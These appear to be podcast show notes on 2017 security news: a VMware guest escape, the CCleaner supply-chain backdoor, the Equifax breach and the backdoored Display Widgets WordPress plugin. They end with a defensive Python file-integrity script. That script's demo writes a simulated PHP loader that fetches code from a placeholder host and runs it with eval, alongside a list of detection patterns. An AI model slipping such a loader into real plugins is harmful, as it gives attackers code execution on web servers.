Hack Naked News #141
Recorded September 18, 2017 at G-Unit Studios in Rhode Island!
- VMware Patches Bug That Allows Guest to Execute Code on Host - Last Friday VMware disclosed an "escape" vulnerability across its product line, reported by independent security researchers. The flaw lets an attacker in a guest VM jump to the host. It affects vCenter Server 6.5 on Windows and ESXi 6.5 (but not 6.0 or 5.5), as well as Workstation 12.x and Fusion 8.x. Patches are available, so get patching!
- Warning: CCleaner Hacked to Distribute Malware; Over 2.3 Million Users Infected - The Hacker News reports that CCleaner was backdoored in a supply chain attack, quoting: "If you have downloaded or updated CCleaner application on your computer between August 15 and September 12 of this year from its official website, then pay attention—your computer has been compromised." CCleaner is a popular system clean-up and optimization utility with over 2 billion downloads, created by Piriform, which was recently acquired by Avast. Cisco's Talos team discovered that the Avast-controlled servers hosting the software (inherited through the Piriform acquisition) were compromised and the legitimate build replaced with an attacker-modified version. Over 2 million people downloaded the tainted version and must re-install a clean copy (presumably after removing the backdoored one). In cases like this, a complete re-install is what I would do, or a restore from a clean backup.
- Chrome To Label FTP Sites Insecure - Most major projects, Debian and kernel.org included, have stopped offering FTP access to their software. Chrome's team has now decided to flag FTP sites as insecure in the browser, for any remaining projects or sites still using the ancient, unencrypted protocol. While HTTPS is not perfect, it does offer significant advantages over FTP for security, so this is a good move in my opinion.
- Equifax Replaces Key Staff Members Post Breach - Equifax announced that it is replacing the CSO and CIO roles in the company following one of the largest breaches on record: Susan Mauldin, chief security officer, retired and was replaced by Russ Ayres in an interim role, while chief information officer David Webb left and was replaced by Mark Rohrwasser in an interim capacity, the firm said. Folks, don't read too much into this; likely this is just a PR move. We don't have a full picture of what happened, and rather than blaming individuals, I lean more towards blaming the entire organization and the (lack of) security culture present in the organization that likely led to a breach of this magnitude.
- Rogue WordPress Plugin Allowed Spam Injection - Threatpost has reported: A popular WordPress plugin called Display Widgets, running on 200,000 sites, was removed from the official WordPress.org plugin repository after researchers discovered the plugin contained a backdoor that was injecting spam ads into victims' sites. According to researchers at Wordfence, who publicly disclosed the rogue plugin on Tuesday, the backdoor had been present in Display Widgets versions 2.6.1 and 2.6.3 for approximately three months. According to the researchers, the plugin had been removed four times from the WordPress.org repository for similar offenses since June. It's very clear there is still a lack of process at WordPress for vetting plugins. I would love to see a human and automated approach to discovering bugs in plugins....
- Equifax confirms up to 400,000 UK consumers at risk after data breach - Hey, welcome to the club! A statement posted on Equifax's UK website (which previously had made no mention of the hack, first discovered by the company in July) confirmed that around 400,000 UK citizens have been affected by the data breach.
- Quantum Computing Poses Risks to Cryptography and Bitcoin - I suppose the threat of cracking Bitcoin is a concern; however, equally or even more concerning is the potential ability of quantum computing to crack PKI, although I think we are a ways away from that. If you're curious: quantum computing is very different from current forms of silicon-based computing. The allure of quantum computing is that it can make use of quantum states of matter, including subatomic particle entanglement and superposition, to achieve massive processing power.
Expert Commentary with Jason Wood, Paladin Security
Why Display Widgets Went Malicious
WordPress is one of the most popular blogging platforms out there for both bloggers and attackers. It's one of those apps that almost everyone uses (including me), but you have to keep it patched religiously because it is ALWAYS under attack. Plugins that haven't been updated are a prime point of attack. Last week Wordfence (who makes a defensive plugin) released a blog post about a popular WordPress plugin named Display Widgets coming backdoored from WordPress.org.
Display Widgets allows WordPress users to put custom content in preset locations on their sites. It's been around a while, but this summer it suddenly began downloading additional code from the owner's server. It was subsequently removed from WordPress's repository and re-added three times as the author made modifications to the plugin to "fix" the issue while moving the malicious code around.
Wordfence did some digging on what happened with the Display Widgets WordPress plugin. It is kind of an interesting way to spread malicious code: buy a popular plugin and then have it pump out spam, download code to the server, etc. The original author of the plugin sold it to "Mason Soiza" on June 21, 2017 for $15,000. The malicious code was immediately added as a new release and was discovered two days later by another plugin developer. Wordfence's post includes information from the original author of the plugin, including emails from when Mason made the offer to buy the plugin. I'd recommend checking it out.
So what's the point of all this? Mainly that getting your WordPress plugins from a trusted source like WordPress's repository may not always be safe. File integrity monitoring of your WordPress install is highly recommended. Apparently it's worth $15,000 to attackers to buy a popular plugin, ride its reputation to spread spam and backdoor web servers. Don't depend on WordPress to validate the security of your plugins.
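As an added illustration of the file integrity monitoring recommended above (this is example code written for these show notes, not Wordfence's product and not code from the Display Widgets plugin): a Python script that records SHA-256 hashes of every file in a plugin directory while the plugin is trusted, reports added, removed and modified files on a later pass, and then checks only the changed files for the "fetch code from a remote host and execute it" pattern the commentary describes. The plugin layout, file names, pattern list and the `example.invalid` URL are all constructed for the demo and are not the real plugin's files.

```python
import hashlib
import json
import tempfile
from pathlib import Path

# Constructed, non-exhaustive list of PHP constructs that show up in injected
# plugin code: fetching remote content and executing it.
SUSPICIOUS_PATTERNS = (
    "eval(",
    "base64_decode(",
    "file_get_contents('http",
    'file_get_contents("http',
    "curl_exec(",
    "create_function(",
)


def hash_file(path: Path) -> str:
    """SHA-256 of a file, read in chunks so large files need not fit in memory."""
    h = hashlib.sha256()
    with path.open("rb") as f:
        for chunk in iter(lambda: f.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()


def build_baseline(root: Path) -> dict:
    """Map every file under root (path relative to root) to its SHA-256 digest."""
    return {
        p.relative_to(root).as_posix(): hash_file(p)
        for p in sorted(root.rglob("*"))
        if p.is_file()
    }


def diff_baseline(old: dict, new: dict) -> dict:
    """Report files added, removed or changed between two baselines."""
    return {
        "added": sorted(set(new) - set(old)),
        "removed": sorted(set(old) - set(new)),
        "modified": sorted(k for k in old.keys() & new.keys() if old[k] != new[k]),
    }


def flag_suspicious(root: Path, relpaths) -> dict:
    """For each changed file, list which suspicious patterns it contains."""
    hits = {}
    for rel in relpaths:
        text = (root / rel).read_text(errors="replace")
        found = [pat for pat in SUSPICIOUS_PATTERNS if pat in text]
        if found:
            hits[rel] = found
    return hits


def check_plugin_dir(root: Path, baseline: dict) -> dict:
    """One monitoring pass: diff against the stored baseline, then inspect the changes."""
    current = build_baseline(root)
    changes = diff_baseline(baseline, current)
    changed = changes["added"] + changes["modified"]
    return {"changes": changes, "suspicious": flag_suspicious(root, changed)}


def run_demo() -> dict:
    """Constructed scenario: a clean plugin, then an 'update' that adds a remote loader."""
    with tempfile.TemporaryDirectory() as tmp:
        plugin = Path(tmp) / "example-widgets"  # hypothetical plugin directory name
        (plugin / "inc").mkdir(parents=True)
        (plugin / "example-widgets.php").write_text("<?php\n// clean plugin bootstrap\n")
        (plugin / "inc" / "widgets.php").write_text("<?php\nfunction ew_render() {}\n")

        baseline = build_baseline(plugin)  # taken while the plugin was trusted

        # Simulated malicious release: one existing file changed to pull in a new
        # file that downloads and executes remote code (URL is a placeholder).
        (plugin / "example-widgets.php").write_text(
            "<?php\n// clean plugin bootstrap\nrequire 'inc/loader.php';\n"
        )
        (plugin / "inc" / "loader.php").write_text(
            "<?php\n$c = file_get_contents('http://example.invalid/geo.php');\neval($c);\n"
        )

        return check_plugin_dir(plugin, baseline)


if __name__ == "__main__":
    print(json.dumps(run_demo(), indent=2))
```

In practice the baseline would be written to disk (or better, stored off-host) right after a release you have reviewed, and the check run from cron; a plugin update that is legitimate will of course show modified files too, so the pattern check on the changed files is what separates "an update happened" from "an update that phones home".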